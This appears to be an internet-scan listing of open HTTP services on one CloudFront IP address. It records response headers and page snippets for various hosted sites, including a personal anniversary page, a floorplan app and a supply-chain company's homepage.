HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Mon, 22 Dec 2025 19:47:00 GMT Link: <https://triathlon-lumina.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Set-Cookie: AWSALB=xeXqrtm4BDSOK5v9dXDN0x9EOW8HHhtHwvn32LYUNGceBzAo5xJt3T/B3sgNL6+rI6HSC/sxjxXZa2b00Qfjkb/84gADGvlhUmxi+d9UvBEKMNWLwvZC4+3f4vqp; Expires=Mon, 29 Dec 2025 19:47:00 GMT; Path=/ Set-Cookie: AWSALBCORS=xeXqrtm4BDSOK5v9dXDN0x9EOW8HHhtHwvn32LYUNGceBzAo5xJt3T/B3sgNL6+rI6HSC/sxjxXZa2b00Qfjkb/84gADGvlhUmxi+d9UvBEKMNWLwvZC4+3f4vqp; Expires=Mon, 29 Dec 2025 19:47:00 GMT; Path=/; SameSite=None Set-Cookie: uk5f046a4df0598=8b31e31e02ae472937e890f34644cecc; path=/; secure; HttpOnly; SameSite=None Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.3.19 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Cache: Miss from cloudfront Via: 1.1 39e6266db143f6443f194d8c60e22480.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: u7ll18aGD9V-cXK_SImoCZ4GJ58u51vx7h41MUcp7E1CYXAgPB5sEA==
Open service 13.32.99.35:443 · smmallsonline.com
2025-12-22 18:47
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Date: Mon, 22 Dec 2025 18:47:15 GMT Location: https://www.smmallsonline.com/ Server: CloudFront X-Powered-By: CloudFront X-Redirect-By: WordPress X-Cache: Miss from cloudfront Via: 1.1 39e6266db143f6443f194d8c60e22480.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: L6OITmIO2TQ1uYMGgE8GIxqspkDSIvB66zW61Qenj2lzGUhg7xsTAg== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · www.jazyemilio.com
2025-12-22 17:22
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 3296b04068551f925d5fafd1b785ff30.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: yp4itJLL-AaEjF61ihpMG9emT_LKwddREzmH2WfxwJxdKaf5eIRRqw==
Age: 151688
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · mastersuite.com
2025-12-22 16:24
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2976
Connection: close
Date: Mon, 22 Dec 2025 01:37:41 GMT
Last-Modified: Wed, 21 Oct 2020 03:10:47 GMT
ETag: "166b685d213cebc0f3a7336fd56d85d8"
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: eYmuOlg5lB5mCQ4h0zqplpMfSiToBxTJ38rnO0oMsjxNOw2AJ2wiNw==
Age: 53207
Page title: MasterSuite
<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="pragma" content="no-cache"><link rel="shortcut icon" href="/favicon.ico"/><link href="https://use.fontawesome.com/releases/v5.0.1/css/all.css" rel="stylesheet"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><meta name="theme-color" content="#000000"/><meta name="description" content="Generate free floorplans for a house fast and easily in 3D & 2D on any device."/><link rel="manifest" href="/manifest.json"/><link href="https://fonts.googleapis.com/css?family=Montserrat:400,700,200" rel="stylesheet"/><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"><title>MasterSuite</title><script data-ad-client="ca-pub-1272955356336444" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><link href="/static/css/2.790a2e7e.chunk.css" rel="stylesheet"><link href="/static/css/main.d75480aa.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script>!function(e){function r(r){for(var n,l,a=r[0],i=r[1],p=r[2],c=0,s=[];c<a.length;c++)l=a[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(f&&f(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,a=1;a<t.length;a++){var i=t[a];0!==o[i]&&(n=!1)}n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={1:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)l.d(t,n,function(r){return e[r]}.bind(null,n));return t},l.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(r,"a",r),r},l.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},l.p="/";var a=this["webpackJsonpreact-three-boilerplate"]=this["webpackJsonpreact-three-boilerplate"]||[],i=a.push.bind(a);a.push=r,a=a.slice();for(var p=0;p<a.length;p++)r(a[p]);var f=i;t()}([])</script><script src="/static/js/2.d9ee60b8.chunk.js"></script><script src="/static/js/main.05247e34.chunk.js"></script></body></html>
Open service 13.32.99.35:443 · www.blisshome-kyoto.com
2025-12-22 13:02
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Date: Mon, 22 Dec 2025 13:02:39 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.2.34 Location: https://blisshome-kyoto.com/ Cache-Control: max-age=1 Expires: Mon, 22 Dec 2025 13:02:40 GMT Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 0lxw7AV_whlJ4XVRdKYq8XFGoqSnn87MZzPawK26rcz7kMbT-tiVQA==
Open service 13.32.99.35:443 · blisshome-kyoto.com
2025-12-22 13:02
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Mon, 22 Dec 2025 13:02:38 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.2.34 Cache-Control: max-age=1 Expires: Mon, 22 Dec 2025 13:02:39 GMT Vary: Accept-Encoding Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 89f400f550feb1d74a18ecb2070103ac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 32refE04DqmfvCPmVCeYOIZWIuV4UQ7x44ifc2s1TEaFglejH90JTg==
Open service 13.32.99.35:80 · websolarch.com
2025-12-22 11:07
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 11:07:33 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://websolarch.com/ X-Cache: Redirect from cloudfront Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 75wihskwkl-DCmp1FFKbpkez21nHgQUsFVLsRtXCq8ah4FWaqSc4ew== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · websolarch.com
2025-12-22 11:07
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Connection: close Date: Mon, 22 Dec 2025 11:07:34 GMT Location: https://www.websolarch.com/ X-Cache: Miss from cloudfront Via: 1.1 231be1c97cc722fa08b64d21072ebfac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: UTUYgbwwGjQe-9hJxq7Vbeebycak1hOzLMz8FY_euoSvpb3rzKcZmA==
Open service 13.32.99.35:443 · plantryx.com
2025-12-22 11:05
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15550
Connection: close
Date: Mon, 22 Dec 2025 11:05:31 GMT
Last-Modified: Tue, 02 Dec 2025 06:28:23 GMT
ETag: "16f13bad41987047761c6b9cb4ff53b3"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: QBpljYceLSftgQ-K_Z9ob-jJjBerxaBNiN9bKDrJlHUwDIWT9ceqsA==
Page title: Supply Chain AI Solutions By Plantryx
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WP86JFDT');</script>
<!-- End Google Tag Manager -->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<link rel="canonical" href="https://plantryx.com/index.html">
<title>Supply Chain AI Solutions By Plantryx</title>
<link rel="shortcut icon" href="assets/imgs/logos/plantryx-icon.svg" type="image/x-icon">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NGGSZTNBQD"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-NGGSZTNBQD');
</script>
<!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Bootstrap Icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css" rel="stylesheet">
<!-- Custom CSS -->
<link rel="stylesheet" href="assets/css/main.css">
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WP86JFDT"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark fixed-top">
<div class="container">
<a class="navbar-brand" href="index.html">
<img src="assets/imgs/logos/logo.svg" alt="Plantryx" height="40">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link active" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Platform & Solutions
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="solutions/demand-planning.html">Demand Planning</a></li>
<li><a class="dropdown-item" href="solutions/supply-planning.html">Supply Planning</a></li>
<li><a class="dropdown-item" href="solutions/end-to-end-planning.html">End-to-End Planning</a></li>
<li><a class="dropdown-item" href="solutions/platform-capabilities.html">Platform Capabilities</a></li>
<li><a class="dropdown-item" href="solutions/integrations.html">Integrations</a></li>
</ul>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Who We Help
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="industries/mobility-auto.html">Mobility & Auto</a></li>
<li><a class="dropdown-item" href="industries/consumer-goods.html">Consumer Goods</a></li>
<li><a class="dropdown-item" href="industries/energy-commodities.html">Energy & Commodities</a></li>
<li><a class="dropdown-item" href="industries/high-tech.html">High Tech</a></li>
<li><a class="dropdown-item" href="industries/industrial-manufacturing.html">Industrial Manufacturing</a>
</li>
<li><a class="dropdown-item" href="industries/healthcare-life-sciences.html">Healthcare & Life
Open service 13.32.99.35:443 · n.fplr.co
2025-12-22 10:32
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 7251dede1ac94066b27bcd33919b30c6.cloudfront.net (CloudFront)
Age: 810502
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: IV5qGgiNUiSOoaJjvcbHcZo4_p3DdPwJDDIUT4n3JcQ8dxYrLIg-Ug==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · shopgenius.org
2025-12-22 08:40
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 173061
Connection: close
Last-Modified: Tue, 10 Jan 2023 14:17:00 GMT
x-amz-version-id: SW9HIDsh7GmJ6BsDiOVOyOhE.V6hSqCo
Server: AmazonS3
Date: Mon, 22 Dec 2025 08:40:03 GMT
ETag: "9fc1f8e4b631d610498d3ecec09ddc99"
X-Cache: Hit from cloudfront
Via: 1.1 7395d1816622756cd6753f5e1281200c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: qtCauZ8sEoOtgRru1DEnHZXS5BTNNyQzEvVmPqYje5xrNmGnR9Z7Yw==
<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta http-equiv="x-ua-compatible" content="ie=edge"/><meta http-equiv="Cache-control" content="public"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/><link rel="canonical" href="//shopgenius.org"/><link rel="icon" href="/assets/ico.png" sizes="32x32"/><link rel="icon" href="/assets/ico.png" sizes="192x192"/><link rel="apple-touch-icon-precomposed" href="/assets/ico.png"/><meta name="msapplication-TileImage" content="/assets/ico.png"/><style data-href="/styles.67f0a434f687e297e840.css" id="gatsby-global-css">@import url(//fonts.googleapis.com/css2?family=Roboto:wght@300;400;700&display=swap);@import url(https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap);.offer2-module--extendedhomepage body,.offer2-module--extendedhomepage html{font-family:Roboto,sans-serif;margin:0!important;padding:0}.offer2-module--extendedhomepage a{color:#404340;text-decoration:none;font-size:12px}.offer2-module--extendedhomepage h2{font-family:Circular-Pro-Black,Helvetica-Bold,Helvetica,Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-size:20px;line-height:30px;color:#404340;font-size:30px;line-height:40px;font-weight:700}.offer2-module--extendedhomepage h2:first-child{margin-top:50px}.offer2-module--extendedhomepage .offer2-module--header{height:90px;align-items:center;position:-webkit-sticky;position:sticky;top:0;background:#fff;padding:0 100px;box-shadow:11px 15px 29px 0 rgba(77,77,77,.07058823529411765)}.offer2-module--extendedhomepage .offer2-module--header .offer2-module--headerwrapper{max-width:800px;padding:14px 40px;display:flex;margin:0 auto;align-items:center}.offer2-module--extendedhomepage p.offer2-module--ftcDisclosure{font-size:10px;margin:0 0 5px}.offer2-module--extendedhomepage .offer2-module--toplogo{height:43.3px;background-image:url(https://cdn.ivaws.com/wikibuy-assets/images/upload_content/HQ1.png);background-repeat:no-repeat;background-position:50%;background-size:contain}.offer2-module--extendedhomepage .offer2-module--logodiv{flex:4 1}.offer2-module--extendedhomepage p.offer2-module--date{font-family:Georgia,serif;font-size:14px;color:#273c46}.offer2-module--extendedhomepage button{max-width:496px;display:block;align-items:center;justify-content:center;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;min-height:48px;line-height:1;padding-left:20px;padding-right:20px;font-size:14px;background-color:#0276b1;border-radius:6px;letter-spacing:.5px;outline:none;text-align:center;transition:all .2s ease;cursor:pointer;-webkit-user-select:none;user-select:none;height:40px;border:1px solid transparent;color:#fff;font-family:Circular-Pro-Black,Helvetica,Arial,sans-serif}.offer2-module--extendedhomepage button span{margin-right:.25rem;font-weight:700}.offer2-module--extendedhomepage button:hover{background:#026597}.offer2-module--extendedhomepage .offer2-module--blueText{color:#0276b1;cursor:pointer}.offer2-module--extendedhomepage h3{font-size:21px;font-family:Georgia,serif;color:#273c46;font-weight:400;line-height:34px;margin-top:35px}.offer2-module--extendedhomepage .offer2-module--heavy{font-weight:700}.offer2-module--extendedhomepage .offer2-module--allContainer{padding:0 40px;max-width:800px;width:100%;margin:0 auto}.offer2-module--extendedhomepage .offer2-module--allContainer img{max-width:2816px;width:100%;box-shadow:0 4px 7px 0 rgba(0,0,0,.10196078431372549),0 6px 18px 0 rgba(0,0,0,.10196078431372549);margin:43px auto 0;display:block}.offer2-module--extendedhomepage .offer2-module--allContainer button{width:100%;font-size:110%;height:60px}.offer2-module--extendedhomepage .offer2-module--ratinglabel{text-align:left;color:#a1a1a1;font-size:15px;width:200px}.offer2-module--extendedhomepage .offer2-module--footcta{display:flex;flex-direction:row;margin:50px -25px}.offer2-module--extendedhomepage .offer2-module--btnname{flex:3 1;margin-right:50px;border-right:1px solid #dedede;padding:25px 50px 25px 0}.offer2-module--extendedhomepage .offer2-module--footcta sv
Open service 13.32.99.35:80 · shopgenius.org
2025-12-22 08:40
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 08:40:02 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://shopgenius.org/ X-Cache: Redirect from cloudfront Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: CNe8XHa50741QYUBN_zglAvWCUZ6VOSLw4MK7ZRnliOpetlvhseURQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · kingwild.vip
2025-12-22 07:38
HTTP/1.1 403 Forbidden Server: CloudFront Date: Mon, 22 Dec 2025 07:38:10 GMT Content-Type: text/html Content-Length: 986 Connection: close X-Cache: Error from cloudfront Via: 1.1 544814e402956ba93c0a2d2b923e94c2.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: Zdx_6bBQlX87j-dkOGxhWy2H_wptfE5euBzmSR_gbh08Zuhef4yD4w== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> The Amazon CloudFront distribution is configured to block access from your country. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: Zdx_6bBQlX87j-dkOGxhWy2H_wptfE5euBzmSR_gbh08Zuhef4yD4w== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · www.respellion.nl
2025-12-22 05:02
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 05:02:23 GMT Content-Length: 0 Connection: close Location: https://respellion.nl/ X-Cache: FunctionGeneratedResponse from cloudfront Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: y-nViBASWj_mtBxIIUkKf2J2JGZgS8aDgOjaCk5MxyOkLFHT8CNwAA== X-XSS-Protection: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000
Open service 13.32.99.35:80 · www.respellion.nl
2025-12-22 05:02
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 05:02:23 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://www.respellion.nl/ X-Cache: Redirect from cloudfront Via: 1.1 ab21b6436bc1d51d57b228ad39b1fa54.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: syZU3LLs-R0BP9XlsOPeBe3WAmq-pop7Zbfner6dv849j060Gs8iEw== X-XSS-Protection: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer X-Content-Type-Options: nosniff Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:80 · wf-pm-observational-assessment-scores-summary.qa.performancematters.com
2025-12-22 04:48
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 04:48:32 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://wf-pm-observational-assessment-scores-summary.qa.performancematters.com/ X-Cache: Redirect from cloudfront Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: poddoP6magYOZGeEFisMuHbOAVOUdtvJNtjQmnqPWoXZBZ_Qs2Kv2A== Vary: Origin Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · wf-pm-observational-assessment-scores-summary.qa.performancematters.com
2025-12-22 04:48
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 297 Connection: close Date: Mon, 22 Dec 2025 04:48:34 GMT Last-Modified: Fri, 14 Nov 2025 10:44:17 GMT ETag: "53ea02d29576fc6b290429eabdf5e632" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 X-Cache: Error from cloudfront Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: j939wXmmQePBT0gGtMAE34nxHKDJIKDS8EI7lBSCrGDvzZeYaQtVHg== Vary: Origin Page title: PM Observational Assessment Scores Summary MFE <!doctype html><html lang="en"><head><base href="/"/><title>PM Observational Assessment Scores Summary MFE</title><script defer="defer" src="bundle.8a3bebe62fe1b532297c.js"></script><script defer="defer" src="remoteEntry.js"></script></head><body><div id="react-app-injection"></div></body></html>
Open service 13.32.99.35:443 · loveedellis.co.kr
2025-12-22 04:24
